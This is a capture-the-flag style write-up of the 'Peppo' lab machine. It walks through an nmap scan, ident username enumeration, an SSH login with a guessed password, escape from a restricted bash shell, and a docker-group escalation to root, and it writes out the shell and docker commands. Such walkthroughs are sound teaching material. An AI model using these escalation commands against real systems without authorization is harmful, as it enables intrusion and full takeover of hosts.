> For the complete documentation index, see [llms.txt](https://fg0x0.gitbook.io/fg0x0s-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://fg0x0.gitbook.io/fg0x0s-notes/offensive-security/pg-practice/try-harder/peppo.md).

# Peppo

<figure><img src="/files/5dN9mT65RPg2ZDgh5m1z" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running we can use the Perl script `ident-user-enum` to identify which services are running under what user.

<figure><img src="/files/6l7cfTAPJIr0No17fKMM" alt=""><figcaption></figcaption></figure>

Port 10000 reports it is running under the user 'Eleanor'. I tried Bruteforcing the username on `SSH` and had no luck. Eventually simply trying `eleanor:elenaor` I was able to log in on SSH.

<figure><img src="/files/1KM0olbJZlxsC4UvofYM" alt=""><figcaption></figcaption></figure>

We see from trying the `id` the command we are locked in with a restricted bash shell. We can check out our command availability by viewing what binaries we have access to.

<figure><img src="/files/a3vyGGDcs6zA8cxHDMOR" alt=""><figcaption></figcaption></figure>

Checking GTFObins for any of these binaries can spawn a shell to escape a restricted one:

<figure><img src="/files/A3R6lhIziB2BxHBHa4YB" alt=""><figcaption></figcaption></figure>

After running the above command we can export a new path and then spawn a Python shell then again export the path to having full function over the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

<figure><img src="/files/DQVAXcGe6Gr55z8cuzq3" alt=""><figcaption></figcaption></figure>

The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

<figure><img src="/files/jiWcMkmsEXZ5S0NVTBxy" alt=""><figcaption></figcaption></figure>

First, check what images we have available to us:

```
docker image ls
```

We can use the GTFObins command to replace the value `<alpine>` with one of the images listed above.

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

<figure><img src="/files/cWbsZIvT2AaA8vLC9dUm" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
If you found this page helpful to you, please rate it below as per the feedback options. For any corrections or general communications, please see the root page [**Pentest Everything**](http://localhost:5000/s/-MFlgUPYI8q83vG2IJpI/) for contact information.
{% endhint %}
